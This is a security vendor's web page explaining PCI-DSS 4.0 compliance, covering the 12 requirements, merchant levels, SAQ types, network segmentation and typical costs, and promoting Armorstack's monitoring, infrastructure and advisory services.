Compliance
PCI-DSS 4.0 Compliance for Payment-Handling Organizations
PCI-DSS 4.0, effective March 31, 2024, introduced significant changes to how organizations must approach cardholder data protection — tightening requirements around authentication, encryption, vulnerability management, and continuous monitoring. Organizations that assessed compliance against version 3.2.1 cannot assume those assessments remain valid. Armorstack’s SENTRY monitoring, CORE infrastructure management, and VERITY advisory operationalize PCI-DSS 4.0 compliance across your cardholder data environment.
PCI-DSS 4.0: What Changed and Why It Matters
The Payment Card Industry Data Security Standard is maintained by the PCI Security Standards Council, a body established by American Express, Discover, JCB, Mastercard, and Visa. It applies to any organization that stores, processes, or transmits cardholder data. Version 4.0, finalized in March 2022, became the mandatory standard on March 31, 2024, when version 3.2.1 was retired.
The core structure remains 12 requirements organized around six control objectives, but PCI-DSS 4.0 made substantive changes across multiple requirements. Detailed analysis of the requirement-by-requirement changes is at PCI-DSS 4.0 changes. The most operationally significant shifts include:
- Authentication requirements strengthened (Requirement 8) — Multi-factor authentication is now required for all access into the cardholder data environment (CDE), not just for remote access. Password minimum length increased to 12 characters. Inactive account lockout reduced to 15 days of inactivity.
- Phishing resistance addressed (Requirement 5) — Anti-phishing controls must be in place for personnel with access to the CDE, including phishing-resistant MFA where feasible.
- Targeted risk analysis introduced — PCI-DSS 4.0 allows organizations to use a targeted risk analysis to justify certain control frequencies rather than defaulting to prescriptive calendar schedules. This increases flexibility but requires documented, defensible methodology.
- E-commerce and payment page security expanded (Requirement 6) — Organizations that run payment pages must deploy mechanisms to manage and authorize HTTP scripts executing on their payment pages, addressing the growing threat of web skimming (Magecart-style attacks).
- Continuous monitoring elevated — Requirements 10 and 11 reinforce that log review, vulnerability scanning, and intrusion detection must be continuous or near-continuous rather than periodic for scope systems.
The 12 PCI-DSS Requirements
| Requirement | Title | Common Gap |
|---|---|---|
| 1 | Install and maintain network security controls | No documented network diagrams showing CDE boundary |
| 2 | Apply secure configurations to all system components | Vendor default credentials unchanged on network devices |
| 3 | Protect stored account data | Primary account numbers (PAN) stored unencrypted or without tokenization |
| 4 | Protect cardholder data in transit | Legacy systems using TLS 1.0 or 1.1 for PAN transmission |
| 5 | Protect all systems against malware | EDR agents absent from servers in the CDE |
| 6 | Develop and maintain secure systems and software | No web application firewall or script management for payment pages |
| 7 | Restrict access to system components and cardholder data | Access provisioned by request without role-based authorization documentation |
| 8 | Identify users and authenticate access | MFA not enforced for all CDE access; passwords below 12-character minimum |
| 9 | Restrict physical access to cardholder data | No physical access log for server rooms; no badge system for CDE areas |
| 10 | Log and monitor all access to system components and cardholder data | Logs not centralized or not retained for 12 months (3 months immediately available) |
| 11 | Test security of systems and networks regularly | No quarterly external vulnerability scan by an ASV; no annual penetration test |
| 12 | Support information security with organizational policies and programs | Security policy not updated in current year; no annual risk assessment |
Merchant Levels and Validation Requirements
PCI-DSS validation requirements — including whether a Qualified Security Assessor (QSA) on-site assessment is required or whether a Self-Assessment Questionnaire suffices — are determined by merchant level, which is defined by annual card transaction volume and by individual card brand rules.
| Merchant Level | Annual Visa/Mastercard Transactions | Validation Requirement |
|---|---|---|
| Level 1 | More than 6 million | Annual on-site QSA assessment; quarterly network scans by ASV |
| Level 2 | 1 million to 6 million | Annual SAQ or QSA assessment; quarterly ASV scans |
| Level 3 | 20,000 to 1 million (e-commerce) | Annual SAQ; quarterly ASV scans |
| Level 4 | Fewer than 20,000 (e-commerce) or up to 1 million (other) | Annual SAQ; quarterly ASV scans recommended |
Note that card brands set their own merchant level definitions and may escalate a merchant’s level following a data compromise regardless of transaction volume. Acquirers (the banks that process merchants’ card transactions) have authority to enforce stricter validation requirements than the card brand minimums. Full detail on merchant level determination and its implications is at PCI-DSS merchant levels.
Self-Assessment Questionnaire Types: Selecting the Right SAQ
Organizations not required to complete a full QSA assessment may validate compliance through a Self-Assessment Questionnaire. PCI-DSS 4.0 maintains multiple SAQ variants, each applicable to a specific payment acceptance model. Selecting the wrong SAQ — or defaulting to a simpler SAQ when a more comprehensive one applies — creates compliance risk and can result in liability exposure following a breach.
| SAQ Type | Applicable To | Approximate Question Count | Key Characteristic |
|---|---|---|---|
| SAQ A | Card-not-present merchants; all cardholder data functions fully outsourced | ~22 questions | No electronic cardholder data on merchant systems or premises |
| SAQ A-EP | E-commerce merchants with payment page partially hosted by third party | ~191 questions | Merchant’s website affects security of payment transaction |
| SAQ B | Merchants using imprint machines or standalone dial-out terminals only | ~41 questions | No electronic cardholder data storage; no internet connectivity for terminals |
| SAQ B-IP | Merchants using standalone IP-connected payment terminals | ~83 questions | Terminals do not store cardholder data; IP-connected but isolated |
| SAQ C | Merchants with payment application systems connected to the internet | ~161 questions | No electronic cardholder data storage beyond transaction authorization |
| SAQ C-VT | Merchants using web-based virtual terminals only | ~65 questions | Single transactions entered manually; no electronic storage |
| SAQ D (Merchant) | Merchants not eligible for any other SAQ type | ~329 questions | Full assessment scope including storage, processing, and transmission |
| SAQ D (Service Provider) | Service providers not eligible for another SAQ type | ~331 questions | Full scope; often equivalent to QSA assessment in effort required |
A common and consequential error is for e-commerce merchants to file SAQ A when SAQ A-EP or SAQ D applies because their website code affects the payment flow. Full guidance on SAQ eligibility criteria is at PCI-DSS SAQ types.
Network Segmentation: The Single Highest-ROI PCI Control
PCI-DSS compliance scope is defined by the cardholder data environment — all system components that store, process, or transmit cardholder data, plus all systems that can communicate with those components. Without network segmentation, a flat network architecture means the entire network is in scope, dramatically increasing both compliance cost and breach risk.
Proper network segmentation isolates CDE systems from out-of-scope systems using firewalls, VLANs, or software-defined perimeters with documented rulesets. When implemented correctly, segmentation reduces the number of system components subject to PCI-DSS controls — potentially by 80% or more — which reduces the cost of both remediation and ongoing validation.
PCI-DSS 4.0 requires organizations using segmentation to validate its effectiveness at least annually and following significant changes to the CDE or network architecture. That validation requires penetration testing specifically scoped to confirm that the segmentation controls prevent out-of-scope systems from reaching in-scope systems. SENTRY managed detection and response provides continuous monitoring of network traffic to detect segmentation failures in real time. CORE managed IT services designs and maintains the network architecture, VLAN configuration, and firewall rulesets that define the CDE boundary. Segmentation architecture guidance and testing requirements are detailed at PCI-DSS network segmentation.
PCI-DSS Compliance Cost: What Organizations Should Expect
PCI-DSS compliance cost varies significantly based on merchant level, current control posture, network architecture, and whether significant remediation work is required. The following are general market ranges based on organization type — not Armorstack pricing. Contact Armorstack directly for a scoped engagement estimate.
| Expense Category | Typical Market Range | Notes |
|---|---|---|
| Gap assessment and remediation consulting | $15,000 – $60,000 | Varies by current posture and CDE scope size |
| QSA on-site assessment (Level 1) | $50,000 – $200,000+ | Depends on environment complexity and QSA firm |
| ASV quarterly scans | $1,000 – $5,000 per quarter | Required for all merchant levels |
| Annual penetration test (CDE scope) | $15,000 – $40,000 | Includes segmentation validation for segmented environments |
| Ongoing compliance program management | $2,500 – $8,000 per month | Monitoring, log management, policy maintenance, evidence collection |
A detailed breakdown of cost factors by merchant level and organization profile is at PCI-DSS compliance cost.
Armorstack’s PCI-DSS 4.0 Compliance Program
Armorstack approaches PCI-DSS compliance as an operational program rather than an annual assessment event. VERITY advisory establishes the governance layer: scoping and CDE definition, risk assessment, policy framework, and evidence management. SENTRY managed detection and response operationalizes Requirements 10 and 11 — centralized log collection and retention across CDE systems, continuous monitoring with documented alert review, and quarterly vulnerability scan management. CORE managed IT services maintains the infrastructure controls that touch Requirements 1 through 8: firewall configuration management, patch management, endpoint protection, MFA enforcement, access control, and encryption at rest and in transit.
For organizations pursuing the 90-Day Proof, the PCI-DSS track focuses the first 30 days on scoping and gap identification, the next 30 on high-priority control implementation, and the final 30 on evidence collection infrastructure and pre-assessment readiness. To discuss your cardholder data environment and where your current PCI-DSS gaps are, talk to an Armorstack compliance expert.